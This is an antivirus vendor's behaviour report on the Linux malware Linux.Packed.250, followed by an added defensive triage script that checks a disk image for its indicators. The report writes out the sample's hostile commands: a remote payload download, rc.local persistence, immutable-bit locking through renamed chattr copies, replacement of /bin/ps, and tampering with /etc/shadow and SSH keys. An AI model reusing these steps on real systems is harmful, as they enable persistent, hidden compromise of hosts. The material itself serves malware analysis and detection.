Linux.Packed.250

Added to the Dr.Web virus database: 2018-12-25

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/rc.local
Malicious functions:
Removes itself
Gets access to SSH keys
  • /root/.ssh/authorlzed_keys
  • /root/.ssh/
Modifies firewall settings:
  • iptables -L INPUT
  • iptables -D INPUT -s -j DROP
Replaces the following system files:
  • /bin/ps
  • /bin/sedYc3yag
Manages services:
  • service network restart
  • systemctl restart network.service
Launches processes:
  • /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' "$@" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/sh <SAMPLE_FULL_PATH> -c
  • cp -f /usr/bin/chattr /usr/bin/lockr
  • cp -f /usr/bin/chattr /usr/bin/.locks
  • cp -f /usr/bin/.locks /usr/bin/lockr
  • chmod 777 /usr/bin/lockr
  • chmod 777 /usr/bin/.locks
  • lockr +i /usr/bin/lockr
  • lockr +i /usr/bin/.locks
  • lockr -i /usr/bin/dget
  • chmod 777 /usr/bin/dget
  • lockr +i /usr/bin/dget
  • lockr -i /usr/bin/pkill
  • chmod 777 /usr/bin/pkill
  • lockr +i /usr/bin/pkill
  • lockr -i /usr/bin/nohup
  • chmod 777 /usr/bin/nohup
  • lockr +i /usr/bin/nohup
  • lockr -i /usr/bin/killall
  • chmod 777 /usr/bin/killall
  • lockr +i /usr/bin/killall
  • lockr -i /usr/bin/nslookup
  • chmod 777 /usr/bin/nslookup
  • lockr +i /usr/bin/nslookup
  • lockr -i /usr/bin/
  • lockr -i /etc/init.d/
  • cat /etc/long.conf
  • awk {print $1}
  • date +%s%N
  • md5sum
  • head -c 10
  • awk {print $2}
  • nslookup linux.bc5j.com
  • grep Address:
  • lockr -i /etc/
  • lockr -i /etc/resolv.conf
  • lockr +i /etc/resolv.conf
  • sleep 1
  • mkdir /usr/bin/dpkgd/
  • cp -f /bin/ss /usr/bin/dpkgd/ss
  • cp -f /bin/ss /usr/bin/iss
  • chmod 777 /usr/bin/iss
  • chmod 777 /usr/bin/dpkgd/ss
  • lockr +i /usr/bin/dpkgd/ss
  • lockr +i /usr/bin/iss
  • cp -f /bin/netstat /usr/bin/dpkgd/netstat
  • cp -f /bin/netstat /usr/bin/nets
  • chmod 777 /usr/bin/nets
  • chmod 777 /usr/bin/dpkgd/netstat
  • lockr +i /usr/bin/dpkgd/netstat
  • lockr +i /usr/bin/nets
  • cp -f /bin/ps /usr/bin/dpkgd/ps
  • cp -f /bin/ps /usr/bin/ips
  • chmod 777 /usr/bin/ips
  • chmod 777 /usr/bin/dpkgd/ps
  • lockr +i /usr/bin/dpkgd/ps
  • lockr +i /usr/bin/ips
  • cp -f /etc/hosts.deny /etc/deny.bak
  • lockr +i /etc/deny.bak
  • cp -f /etc/hosts.allow /etc/allow.bak
  • lockr +i /etc/allow.bak
  • grep
  • grep ACCEPT
  • ips -ef
  • grep byquange
  • grep -v grep
  • wc -l
  • lockr -i /usr/bin/stone
  • rm -f /usr/bin/stone
  • dget http://:5788/stone
  • sh -c command -v curl >/dev/null 2>&1
  • sh -c command -v wget >/dev/null 2>&1
  • sh -c /bin/bash -c 'DGET_PATH=''
  • /bin/bash -c DGET_PATH=
  • mv -f /usr/bin/stone /usr/bin/f2d3e2f4b1
  • nets -anept
  • grep :2898
  • cut -d / -f 1
  • awk {print $9}
  • killall byquange
  • pkill byquange
  • lockr -i /usr/bin/byquange
  • rm -f /usr/bin/byquange
  • lockr -i /etc/long.conf
  • sed -i s|byquange|f2d3e2f4b1| /etc/long.conf
  • lockr +i /etc/long.conf
  • cat /bin/ps
  • lockr -i /bin/
  • lockr -i /bin/ps
  • chmod 777 /bin/ps
  • lockr +i /bin/ps
  • grep :2897
  • chmod 777 /usr/bin/f2d3e2f4b1
  • cp -f /usr/bin/f2d3e2f4b1 /usr/bin/longbak
  • nohup /usr/bin/f2d3e2f4b1
  • /usr/bin/f2d3e2f4b1
  • chmod 777 /usr/bin/longbak
  • lockr +i /usr/bin/longbak
  • cat /etc/rc.local
  • grep start
  • lockr -i /etc/rc.local
  • sed -i /start/d /etc/rc.local
  • grep /usr/bin/3529885178
  • grep exit 0
  • sed -i s|exit 0|/usr/bin/d6e152dfcd start| /etc/rc.local
  • cat /etc/passwd
  • grep quange
  • lockr -i /etc/passwd
  • lockr -a /etc/passwd
  • lockr +i /etc/passwd
  • cat /etc/shadow
  • lockr -i /etc/shadow
  • lockr -a /etc/shadow
  • lockr +i /etc/shadow
  • lockr -i /root/.ssh/
  • lockr -i /root/.ssh/authorlzed_keys
  • mkdir -p /root/.ssh
  • rm -f /root/.ssh/authorized_keys*
  • /etc/init.d/sshd restart
  • lockr +i /root/.ssh/authorlzed_keys
  • date +%F
  • netstat -ntlp
  • grep sshd
  • awk -F: {if($4!="")print $4}
  • /sbin/ifconfig -a
  • grep inet
  • grep -v 127.0.0.1
  • grep -v inet6
  • tr -d addr:
  • nslookup ftp.bc5j.com
  • chmod 0755 /etc/up-date
  • killall .sshd
  • nohup /etc/up-date
  • /etc/up-date
  • ftp -n
  • pkill .sshd
  • cat /dev/null
  • rm -rf /etc/up-date
  • lockr -i /usr/bin/.sshd
  • rm -f /usr/bin/.sshd
  • lockr -i /usr/bin/wget
  • rm -f /usr/bin/wget
  • lockr -i /usr/bin/chattr
  • rm -f /usr/bin/chattr
  • lockr -i /etc/hosts.deny
  • cp -f /etc/deny.bak /etc/hosts.deny
  • lockr +i /etc/hosts.deny
  • lockr -i /etc/hosts.allow
  • cp -f /etc/allow.bak /etc/hosts.allow
  • lockr +i /etc/hosts.allow
  • sed -i s|3529885178|d6e152dfcd| /etc/long.conf
  • cp -f <SAMPLE_FULL_PATH> /usr/bin/d6e152dfcd
  • chmod 777 /usr/bin/d6e152dfcd
  • nohup /usr/bin/d6e152dfcd
  • /usr/bin/d6e152dfcd
  • /bin/sh /usr/bin/d6e152dfcd -c exec '/usr/bin/d6e152dfcd' "$@" /usr/bin/d6e152dfcd
  • sed -i s|3529885178|d6e152dfcd| /bin/ps
  • /bin/sh /usr/bin/d6e152dfcd -c
  • .locks -i /usr/bin/lockr
  • sed -i s|/usr/bin/3529885178 start|/usr/bin/d6e152dfcd start| /etc/rc.local
  • lockr -i <SAMPLE_FULL_PATH>
  • rm -f <SAMPLE_FULL_PATH>
Performs operations with the file system:
Modifies file access rights:
  • /usr/bin/lockr
  • /usr/bin/.locks
  • /usr/bin/dget
  • /usr/bin/pgrep
  • /usr/bin/nohup
  • /usr/bin/killall
  • /usr/bin/nslookup
  • /usr/bin/iss
  • /usr/bin/dpkgd/ss
  • /usr/bin/nets
  • /usr/bin/dpkgd/netstat
  • /usr/bin/ips
  • /usr/bin/dpkgd/ps
  • /etc/sedySpd6n
  • /bin/ps
  • /etc/sed1pwHLJ
  • /etc/sedolbihn
  • /etc/up-date
  • /etc/sed7M9cgd
  • /usr/bin/d6e152dfcd
  • /bin/sedYc3yag
  • /etc/sedbON6uL
Creates folders:
  • /usr/bin/dpkgd
  • /root/.ssh
Creates or modifies files:
  • /usr/bin/lockr
  • /usr/bin/.locks
  • /etc/long.conf
  • /etc/resolv.conf
  • /usr/bin/dpkgd/ss
  • /usr/bin/iss
  • /usr/bin/dpkgd/netstat
  • /usr/bin/nets
  • /usr/bin/dpkgd/ps
  • /usr/bin/ips
  • /etc/deny.bak
  • /etc/allow.bak
  • /etc/sedySpd6n
  • /etc/sed1pwHLJ
  • /etc/sedolbihn
  • /etc/passwd
  • /etc/shadow
  • /etc/ssh/sshd_config
  • /etc/192.168.218.50
  • /etc/up-date
  • /etc/hosts.deny
  • /etc/hosts.allow
  • /etc/sed7M9cgd
  • /usr/bin/d6e152dfcd
  • /bin/sedYc3yag
  • /etc/sedbON6uL
Deletes files:
  • /usr/bin/stone
  • /usr/bin/byquange
  • /root/.ssh/authorized_keys*
  • /etc/up-date
  • /usr/bin/.sshd
  • /usr/bin/wget
  • /usr/bin/chattr
Network activity:
DNS ASK:
  • li###.bc5j.com
  • ft#.#c5j.com
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
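The command list above is enough to write a file-system sweep for this sample. The script below is an added example, not part of the Dr.Web report or of the sample itself. It takes a root prefix so it can be pointed at a mounted disk image (or at the live host with an empty prefix) and checks for the file names the report records, the /usr/bin/dpkgd stash of ss/netstat/ps copies, the rewritten /etc/rc.local start line, and a /bin/ps that is no longer an ELF binary after the sample's sed -i edit. The function name packed250_triage, the IOC_FILES/IOC_DIRS lists and the assumption that the payload id is always 10 hex characters (as in d6e152dfcd, f2d3e2f4b1 and 3529885178) are choices made here, not statements from the report; the immutable-bit check shells out to lsattr and is skipped where that tool is missing or fails.

```shell
#!/bin/sh
# Added triage helper for the Linux.Packed.250 indicators (example code, not
# from the report). ROOT is a path prefix: a mounted image, or "" for the live host.
# Hypothetical names: packed250_triage, IOC_FILES, IOC_DIRS.

# Files the report shows the sample creating: lockr/.locks are chattr copies,
# iss/nets/ips are stashed copies of ss/netstat/ps, dget is its downloader,
# the rest are payload copies, its config and backups of the TCP wrapper files.
IOC_FILES="/usr/bin/lockr /usr/bin/.locks /usr/bin/dget
/usr/bin/iss /usr/bin/nets /usr/bin/ips
/usr/bin/longbak /usr/bin/d6e152dfcd /usr/bin/f2d3e2f4b1
/etc/long.conf /etc/deny.bak /etc/allow.bak /etc/up-date"
IOC_DIRS="/usr/bin/dpkgd"

# Print one "TAG path" line per indicator found.
# Returns 0 when nothing matched, 1 when at least one indicator was found.
packed250_triage() {
    root=$1
    hits=0

    for f in $IOC_FILES; do
        if [ -e "$root$f" ]; then
            echo "FILE $f"
            hits=1
            # The sample protects its files with the immutable bit (lockr +i).
            # lsattr may be absent or fail on some filesystems: best effort only.
            if command -v lsattr >/dev/null 2>&1; then
                attrs=$(lsattr -d "$root$f" 2>/dev/null | cut -d' ' -f1)
                case $attrs in *i*) echo "IMMUTABLE $f" ;; esac
            fi
        fi
    done

    for d in $IOC_DIRS; do
        if [ -d "$root$d" ]; then
            echo "DIR $d"
            hits=1
        fi
    done

    # rc.local persistence: the sample deletes lines containing "start" and
    # rewrites "exit 0" as "/usr/bin/<id> start". Assumption (not from the
    # report): the id is always 10 hex characters, like d6e152dfcd.
    rc="$root/etc/rc.local"
    if [ -f "$rc" ] && grep -Eq '^/usr/bin/[0-9a-f]{10} start' "$rc"; then
        echo "RCLOCAL $(grep -E '^/usr/bin/[0-9a-f]{10} start' "$rc" | head -n 1)"
        hits=1
    fi

    # /bin/ps is edited with sed -i, so the genuine ELF binary has been replaced
    # by a text wrapper; a ps whose first bytes are not the ELF magic is a hit.
    ps="$root/bin/ps"
    if [ -f "$ps" ]; then
        magic=$(head -c 4 "$ps" | tr -cd 'A-Za-z')
        if [ "$magic" != "ELF" ]; then
            echo "PS_NOT_ELF /bin/ps"
            hits=1
        fi
    fi

    return $hits
}

# Run the sweep only when a root argument is given, e.g.
#   sh packed250_triage.sh /mnt/evidence    (mounted image)
#   sh packed250_triage.sh ""               (live host)
if [ $# -gt 0 ]; then
    packed250_triage "$1"
fi
```

Two caveats follow from the report itself. The sample deletes /usr/bin/chattr and /usr/bin/wget and sets the immutable bit on its own files through its renamed chattr copies (lockr, .locks), so rm -f on the listed paths fails until a chattr taken from trusted media clears +i, including on /usr/bin/lockr and /usr/bin/.locks themselves. And because /bin/ps is rewritten in place and the sample works from its own stashed ss/netstat copies, process and socket listings taken on the infected host are not trustworthy; the sweep therefore looks only at file-system state and is best run against a mounted image from outside the compromised system.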

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
